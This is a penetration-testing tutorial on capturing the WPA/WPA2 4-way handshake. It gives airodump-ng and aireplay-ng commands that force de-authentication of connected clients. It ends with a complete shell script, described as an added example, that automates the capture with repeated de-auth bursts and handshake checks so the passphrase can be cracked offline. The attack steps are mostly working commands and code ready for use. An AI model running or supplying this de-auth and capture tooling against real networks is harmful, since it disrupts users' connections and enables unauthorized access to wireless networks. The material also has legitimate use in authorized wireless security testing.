Handshake Capture

Intro & Concept

  • One way to attack WPA/WPA2-PSK Wi-Fi networks is to capture the 4-way handshake between a client and the AP. It is sent in clear on every (re)association, so you can either wait passively for a client to connect or force one to re-authenticate. The handshake does not contain the passphrase, but it contains enough material (ANonce, SNonce, the MACs and the MIC) to test candidate passphrases offline.

  • To capture it you need the target AP's BSSID (or ESSID), the channel the AP is operating on, and a wireless interface in monitor mode (for example created with airmon-ng start wlan0, which usually yields wlan0mon). Locking airodump-ng to that channel and BSSID keeps it from hopping and missing the handshake frames.

airodump-ng wlan0mon -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap #Monitor-mode interface, locked to channel 6 and the target BSSID; writes /tmp/psk-01.cap (index increments on each run)
  • Now you have two options: wait for a client to connect to the AP you are targeting, or go active. I always prefer the second option. Send de-authentication frames to kick a connected client off the network (either one specific client or everyone via broadcast); when it reconnects, the handshake is exchanged again and airodump-ng records it. Keep airodump-ng running in one terminal and send the de-auth frames from a second one on the same monitor interface.

aireplay-ng -0 5 -a 64:20:9F:15:4F:D7 wlan0mon #Send 5 de-auth frames to the broadcast address (no -c) and de-auth all clients; -a is the AP BSSID, -e 'AP_name' works as well
aireplay-ng -0 5 -a 64:20:9F:15:4F:D7 -c 'CLIENT_MAC' wlan0mon #De-auth one specific client (replace CLIENT_MAC with its address from the airodump-ng station list)
#-0 0 sends de-auth frames until you stop it; this also prevents the client from completing the reconnection you need, so use a small count and repeat if necessary
  • Once "WPA handshake: 64:20:9F:15:4F:D7" appears in the top-right corner of the airodump-ng screen, you can stop sniffing and move on to cracking. Before that, verify the capture actually holds a usable handshake: aircrack-ng /tmp/psk-01.cap lists the network as "WPA (1 handshake)" when it does, and "(0 handshake)" when only part of the exchange was caught. In the latter case leave airodump-ng running and send another round of de-auth frames.
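The procedure above as one script, added here as an example and not taken from the original page or from the aircrack-ng project. It assumes the aircrack-ng suite is installed, the script runs as root, and the interface passed as the first argument is already in monitor mode; the capture path, the de-auth count (5 frames per round, 6 rounds) and the aircrack-ng summary line it parses are assumptions, and the AIRCRACK_SAMPLE text is constructed to mirror that summary for offline testing.

```shell
#!/bin/sh
# Added example: capture a WPA/WPA2 4-way handshake with bounded de-auth rounds.
# Usage: ./handshake.sh <monitor_iface> <bssid> <channel> [capture_prefix] [client_mac]
# Assumes airodump-ng, aireplay-ng and aircrack-ng are installed and we run as root.
set -u

# Return 0 if $1 is six colon-separated hex octets (catches typos such as cf:ws).
valid_mac() {
  printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# airodump-ng -w PREFIX writes PREFIX-01.cap, PREFIX-02.cap, ... (first free index);
# compute the file it will create so we can poll it later.
next_capture_path() {
  i=1
  while [ -e "$1-$(printf '%02d' "$i").cap" ]; do i=$((i + 1)); done
  printf '%s-%02d.cap\n' "$1" "$i"
}

# Parse the handshake count aircrack-ng prints for BSSID $2 in its network
# summary ($1 is that text). Prints 0 when the BSSID is not listed.
handshake_count() {
  n=$(printf '%s\n' "$1" | grep -i "$2" \
      | sed -n 's/.*(\([0-9][0-9]*\) handshake.*/\1/p' | head -n 1)
  printf '%s\n' "${n:-0}"
}

# Constructed sample of the aircrack-ng summary table (assumed format) used to
# illustrate handshake_count; the first BSSID is the one from the page above.
AIRCRACK_SAMPLE='   #  BSSID              ESSID                     Encryption

   1  64:20:9F:15:4F:D7  ExampleNet                WPA (1 handshake)
   2  AA:BB:CC:DD:EE:FF  OtherNet                  WPA (0 handshake)'

main() {
  mon=$1; bssid=$2; chan=$3; prefix=${4:-/tmp/psk}; client=${5:-}
  valid_mac "$bssid" || { echo "invalid BSSID: $bssid" >&2; return 2; }
  if [ -n "$client" ] && ! valid_mac "$client"; then
    echo "invalid client MAC: $client" >&2; return 2
  fi
  cap=$(next_capture_path "$prefix")

  # Lock the sniffer to the AP's channel and BSSID, in the background.
  airodump-ng "$mon" -c "$chan" --bssid "$bssid" -w "$prefix" \
    --output-format pcap >/dev/null 2>&1 &
  dump_pid=$!
  trap 'kill "$dump_pid" 2>/dev/null' EXIT
  sleep 5

  round=0
  while [ "$round" -lt 6 ]; do
    round=$((round + 1))
    # A small burst, not -0 0: the client must be able to reconnect for the
    # handshake to be exchanged again.
    if [ -n "$client" ]; then
      aireplay-ng -0 5 -a "$bssid" -c "$client" "$mon" >/dev/null 2>&1
    else
      aireplay-ng -0 5 -a "$bssid" "$mon" >/dev/null 2>&1
    fi
    sleep 10
    # Ask aircrack-ng whether the capture now holds a complete handshake.
    if [ -f "$cap" ]; then
      summary=$(aircrack-ng "$cap" </dev/null 2>/dev/null)
      if [ "$(handshake_count "$summary" "$bssid")" -ge 1 ]; then
        echo "handshake captured in $cap"
        return 0
      fi
    fi
  done
  echo "no handshake after $round de-auth rounds; retry or wait passively" >&2
  return 1
}

# Only run the capture when called with arguments, so the helpers can be sourced.
if [ "$#" -ge 3 ]; then main "$@"; fi
```

The helpers are kept separate from the capture loop on purpose: the MAC check would have rejected the mistyped client address in the command above before any frames were sent, and computing the capture path in advance avoids guessing which psk-NN.cap file airodump-ng is writing to.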
